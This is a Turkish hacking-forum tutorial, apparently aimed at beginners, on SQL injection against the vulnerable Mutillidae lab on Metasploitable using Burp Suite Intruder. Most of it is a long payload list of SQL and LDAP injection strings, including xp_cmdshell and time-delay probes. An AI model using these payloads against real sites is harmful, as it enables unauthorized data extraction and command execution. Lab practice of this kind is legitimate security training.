• Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

Etik olarak webb sitesi hackleme

Gerekenler: Metasploitable, sanal makina ve varsa kali linux gibi bir işletim sistemi yoksa sadece burp suite kullanacağımız için burpsuite toolu yardımcı olacaktır
ilk olarak bize metasploitable gerek sanal makinada çalıştırdıktan sonra msfadmin diyerek
giriş yapıyoruz şifre ve kullanıcı adı msfadmin

sonra ifconfig yazıyoruz Ve burada önemli olan şey şu eğer 2 sanal makina kullanıyorsanız
o iki sanal makina aynı ağda olması gerekir

sonra ip adresini tarayıcımıza yapıştırıyoruz karşımıza çıkan sayfada mutillidae yi seçiyoruz

karşımıza bir sayfa çıkacak şu yolu izleyin

sol tarafta
OWASP Top 10>A1 - Injection > SQLi - Extract Data > User Info

sonra ben firefox kullandığım için firefox üzerinden anlatacm


preferences diyin(Ayarlara gidin)

en aşağıya inin ve Network Settings diyin (Sağındaki settigss.. e basın)

manuel proxy configuration u seçin

HTTP proxy e ve porta şunu yazın

127.0.0.1 port: 8080

sonra also use this proxy for FTP and HTTPS yi seçin ok diyin çıkın

Burpsuiteyi açın next diyip geçin

açıldktan sonra proxy var ona tıklayın

sonra alta alıp siteye geçip username ve passwordu doldurun ben username = username password = password
diye doldurdum

sonra karşınıza burpsuite çıkacak

action diyin çıkan küçük pencerede send to ınturder diyin böylece İntruder e yollayacaksınız

sonra ilk başta seçtiğimiz proxy nin yanında Intruder var ona tıklayın

sağdaki clear a tıklayın

Alta çıkan kod bölmünde biraz değişiklik olduğunu göreceksiniz orada ilk satırda

&username=username yazacak çünkü ben giriş yaparken username diyerek girmiştim
yani altını seçtiğim şeyi vurgulayın &username=username

sonra altını çizdiğim yere Add diyecez

şimdi ise payloads a basın

Kod:
'
"
#
-
--
'%20--
--';
'%20;
=%20'
=%20;
=%20--
\x23
\x27
\x3D%20\x3B'
\x3D%20\x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or%20select *
admin'--
<>"'%;)(&+
'%20or%20''='
'%20or%20'x'='x
"%20or%20"x"="x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
"' or 1 --'"
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
" or 1=1 or ""="
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
&lt;&gt;&quot;'%;)(&amp;+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
Bunları kopyalayın ve ardından burpsuitede paste diyin

start attack a basın

şimdi biz direk sonuca varmak için açılan pencerede 39. numaraya bakalım

response ardından render diyin

şimdi ise karşınıza sitenin aynısı çıkacak alta kaydırdığınızda ayrıntıyı göreceksiniz :)

NOT: Sadece etik olarak kullanmanızı tavsiye ederim

Eksik ve hatam varsa söyleyiniz.
 

Batum

‏‏‏‏‏‏‏‏
Görsellerle süslesen daha anlaşılır olurdu ben biraz gerizekalıyım da okuyarak pek anlamıyom
 
Üst Alt